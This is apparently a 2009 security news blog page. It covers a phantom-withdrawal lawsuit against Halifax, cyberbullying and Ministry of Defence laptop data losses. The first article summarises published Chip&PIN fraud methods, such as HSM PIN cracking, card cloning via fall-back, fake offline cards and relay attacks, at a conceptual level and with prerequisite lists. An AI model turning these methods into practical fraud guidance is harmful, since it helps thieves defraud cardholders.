Phantom Withdrawals Halifax Nightmare

Hundreds of Millions of bank account details have been captured over the last year. Now for the first time in the UK, a man will challenge Chip&PIN security over a phantom withdrawal. A new report has exposed the ongoing data-loss crisis has been helped along by criminal masterminds using increasingly innovative and sneaky methods of attack.

Alain Job, a 40 year old football coach, saw money disappearing from his account but maintains he always had possession of his card and didn't make a withdrawal. His original claim made to the Financial Ombudsman Service (FOS), which mediates disputes between banks and customers was unsuccessful back in 2007. Now, Job has decided to sue over the phantom withdrawal, questioning Chip&PIN security.

"Criminals have re-engineered their processes and developed new tools – such as memory scraping malware and have successfully executed complex attack strategies previously thought to be only theoretically possible and are actively cracking PIN encryption." revealed Verizon's 2009 Data Breach Investigations Report. The news is a result of its Underground Intelligence Unit's operations.

Personal Identification Number's (PIN's) are now the high value target of cyber criminals. Criminals implant internal rogue software to accumulate million's of PIN's an hour and often PIN and account information are sold over the internet to the highest bidder.

One of the methods being used according to the report to collect PIN's is to exploit the financial networks Hardware Security Module (HSM) switches. Worryingly the fraudster requires physical access to one of these switches to be able to collect PIN's.

Usually there is not a direct link between the ATM and the card-holders bank's verification system. The transaction data is bundled up in a encrypted data block and hops along HSM switches on way to the bank. To ensure no single party knows an overall encryption key a different key is used between switches and so the encrypted data block is decrypted and re-encrypted at each switch. Also the data block can be re-formatted at the switch to suit different financial devices and network schemas.

An attack has been documented by a computer student of Tel Aviv University as part of his masters thesis entitled "The unbearable lightness of PIN cracking". The author Omer Berkman describes exploiting the 'Translate' functionality of the box. This is a standard operation of the HSM and part of the Financial PIN Processing API, a 30-year old standard including all the functions for PIN verification, changing and reformatting.

The HSM hack

Prerequisites

• Access to the HSM Switch
• Non-EMV compliant operating ATM (magnetic stripe operation ATM)

The attacker makes transactions with any account number yet at this time he knows the value of the PIN. Once the encrypted PIN and account number data block reaches the HSM, he uses the translate function to change to a weaker data block format using a fixed account number. The attacker only needs 100 transactions and by using a cryptographic flaw in the new format the attacker can build a 10,000 entry look-up table. The attacker uses this table at the HSM to work out any subsequent PIN number.

Military grade encryption specialists, Credant Technologies have suggested a solution, this is to double the encryption by further encrypting the PIN between both end-points (ATM & Bank verification system). Vice President Michael Callahan said; "There is nothing to stop banks adding military grade encryption as an underlay to their existing HSM-based network encryption system and so ensuring their cardholders are safe from this new type of hacking exploit".

The Liability Shift

A lot of documentation on hacking payment systems has become available because of anger at the banks shifting the cost of fraud to the card-holder as a result of Chip&PIN.

Before Chip and PIN, magnetic stripe cards and signatures were used for authorisation, if a fraudulent transaction took place a cardholder could ask for the signature on the receipt be examined against a sample of their own.

Now banks refuse liability. "If you act without reasonable care, you may be responsible for them". Banks now can easily stamp card-holders with not taking enough care in keeping their PIN secret. Now only CCTV can refute the customer's involvement.

Academic institutes have been investigating Chip&PIN attacks. In the UK, Professor Ross Anderson of Cambridge University has been the most vocal, capturing the most media attention on this subject. Anderson and his team have been reverse engineering and documenting attacks on financial security systems for years. In the case of Chip&PIN they have even set-up a dedicated website to highlight the raw-deal card-holders are getting from Chip&PIN. (www.chipandspin.co.uk)

The Cambridge team's work includes;

(May 2005)- Chip and Spin;

The Fall-back Hack

Prerequisites

• Non-EMV compliant operating ATM (magnetic stripe operation ATM)
• Tampered PIN Pad

When a card is presented at an ATM or POS terminal whose chip has been damaged, or which never had a chip, then the device falls back to magnetic stripe operation.

Magnetic stripe card skimming is used to make a clone card, and a tampered PIN Pad records the PIN. The fraudsters then use the half-baked cloned card at an ATM which allows fall-back to magnetic stripe or in a foreign country where EMV is not supported.

The Offline POS Hack

Prerequisites

• Offline Point of Sale Terminal

The fraudster goes to a POS which is not directly connected to the bank's verification system. The fraudster creates a half-baked smartcard using previously stolen account details. The fraudster's card is programmed with any PIN he likes. The card's authenticity is not checked until the POS goes online, in which time the fraudster is long gone.

Modern DDA (Dynamic Data Authentication) cards, have a challenge-response mechanism in which the offline POS can test for card authenticity.

(February 2006) - Phish and Chips;

The Smartcard Relay Hack

Prerequisites

• Tampered PIN Pad/POS
• A fake card with Bluetooth or similar

The victim pays for a small value item at the tampered POS;

"The smartcard data stream would go maybe via GPRS to a PDA in the crooks pocket, then to his fake card, and the captured PIN read out via a headphone in his ear. You think you're paying for lunch, but in fact you're buying the crooks a diamond!"

(February 2009) - Optimised to Fail;

Exploiting Card Readers for Online Banking

Prerequisites

• Hostage

Card Readers for Online Banking may be used to assist during a mugging. Previously, muggers marched a victim to an ATM to ensure he gave them the right PIN. Now, with potable card readers, criminals have a portable device that will tell them if their victim is lying about their PIN.

Many of the more practical attacks exist because many foreign countries are not compliant with EMV and financial systems can be fooled into operating in a non-EMV fall-back mode.

Perhaps the solution would be to apply more pressure to speed up EMV migration and stop legacy payment methods.

One thing is for sure criminals are using ever more sophisticated ways of committing fraud. Banks should be more open to the more far-stretched hacks, especially as insiders are helping the fraudsters and older style cards without the necessary anti-counterfeiting measures are in circulation.

Alain Job, will challenge chip and pin security in the UK in a lawsuit with Halifax building society. This will be the first UK case to question the strength of the bank's security measures. Alain Job claims that £2,100 disappeared from his account whilst Halifax allegedly has evidence that Job's real card was used at a ATM.

The Hearing will be held at Nottingham County Court on 30th April, where many will be eagerly awaiting to hear the outcome of this case, and the conclusions resulting from the questioning of bank security.

Job v. Halifax plc (case number 7BQ00307) Trial Update

Halifax have refused to comment on the case, other than maintaining that it was Mr Job's exact card that was used to withdraw the money, inferring that either Mr Job tried to defraud the bank, or he was grossly negligent in handling his card and PIN. Halifax also highlighted that it would "vigorously defend" itself in court.

As a result of the complexity of this case, the Judge of the one-day trial said that it will take at least one month to deliver his verdict.

1st June 2009: There has been no further reports as yet to the Alain Job vs Halifax plc, however the Judge of the one-day trial is due to deliver his verdict in the next few weeks

6th June 2009: See "Halifax Ghostbust After Trial Closed"

From Playground to Internet

It was discovered today that school children are being bullied not only in the school playground, but on the internet as well.

Cyberbullying is becoming increasingly worrying for teenagers worldwide as the numbers of those seeking help increase as the bullies take to the net.

Cyberbullying is a form of bullying that is caried out through electronic media by a minor to torment, threaten, harass, or otherwise target another minor. Internet services such as e-mail, chat rooms, discussion groups or instant messaging are among the key types of bullying seen, however Cyberbullying can also include bullying through mobile phones, text messages, pagers or belittlement through WebSites.

It has been revealed today that nearly 10,000 children each week are seeking help to cope with Cyberbullying. Backed by PM Gordon Brown, charity Beatbullying have recently launched a website aimed at children seeking support websites for advice after being subjected to abusive forms of Cyberbullying. The shocking results from the site, http://www.cybermentors.org.uk/ show the true scale of the cyberbullying problem for the first time.

Spokeswoman Emma Jane Cross said: "We are experiencing an overwhelming response to the launch of our peer mentoring social networking site - these are serious alarm bells we must act on." Emma then went on to say "bullyiing in any form is unacceptable, but sadly it is an issue that has only been propogated by digital innovations."

More than 600 teenagers have now been trained as CyberMentors to help their fellow classmates on-line. In the website's first breakdown of feedback, the charity have found that 52% of users stated that they had not had their problems listened to by anyone before, 64% of the users believed they felt better after using the website's mentoring system.

BeatBullying has revealed that a third of children are being CyberBullied, or which most of the victims are in the 11-18 year old age range with girls being four times more likely to be bullied than boys.

MoD Admit SAS Data Disappears

The Ministry of Defence announced yesterday that details about SAS soldiers has gone missing after a laptop without encryption went missing during a recent exercise in Britain.

The laptop (similar to that above) was being used by the Signals Regiment, who are attached to the elite force based in Hereford. The discovery of the missing laptop was revealed by Military chiefs during a routine audit kit check, who also identified that details of top secret anti-terror training exercises were contained on the PC, and it is believed to hold information about the names of personnel taking part.

Sources have revealed that the computer holds sensitive information about the military and counter-terrorism manoeuvres within the Signals Regiment. In a statement, the source, who cannot be named for reasons of security, has added that "the soldier in charge of the computer is panicking. It is very embarrassing because keeping tabs on kit is the most important part of working with the SAS."

The Ministry of Defence have insisted that the missing laptop does not hold information about operations or details of weapons. A spokesman from the MoD has given a press statement revealing the opening of an inquiry into the possible theft of the computer and has also added "We can confirm that we are investigating the possible loss of a hard drive, containing only unclassified information which was being used on a training exercise." The spokesman then added, "We are carrying out our inquiries into what happened."

After the loss of many laptops last year, realisation that the British Parliament and the Ministry of Defence should put better enforcement in to place, or actually follow what they have promised to implement into their data security for the last four years. Whilst promising to fortify the measures of security, the MoD information is said to be protected and encrypted. However, it came to light that the Ministry of Defence loses around 15 laptops per month, through the loss or theft of computers and laptops.

At the beginning of October 2008, the UK Minstry of Defence acknowledged that three hard drives containing personal data of over 50,000 current and former Royal Air Force service personnel had been stolen on the 17th of September from a "double-secured" area of the Service Personnel and Veterans Agency's offices at Innsworth Station, Gloucestershire. These were also believed not to be encrypted, as the MoD had placed them in a supposedly secure facility.

Another investigation then was launched a week later, after the MoD acknowledged another loss of a hard drive, this time by the contractor EDS (now a Hewlett-Packard company), providers of IT services through the Department for Work and Pensions (DWP), the Ministry of Justice and the MoD. The hard drive lossed in this instance contained data on 100,000 members of the Britsih armed forces, including the details of next of kins, passport and National Insurance numbers, drivers' licence and bank details and NHS numbers. The hard drive also held the details of 600,000 potential recruits, including their names, addresses, date of birth and telephone numbers of the applicants. The details given by the MoD on the loss of the hard drive revealed a concerning uncertainty to whether the data had been encrypted.

On the 14th October, the Ministry of Defence admitted yet another lost computer. The lost drive's data held not "just" 600,000 potential recruits, but 1.7 million of them. In addition to this, the Mod also worryingly confessed that they were faily certain, like the other losses over the last 6 months, that this computer was not encrypted.

Although the Mod have insisted that the latest of data losses did not contain the details of the operations or weapons within the SAS, Shadow Defence Secretary Liam Fox said that the loss was "deeply concerning". He expressed this in a further statement: "Any loss of data of this nature is deeply concerning, especially if there are security implications." The Defence Secretary then went on to say, "We will want to know the full picture from the Ministry of Defence as soon as possible to ensure that neither civilians nor military personnel are at risk."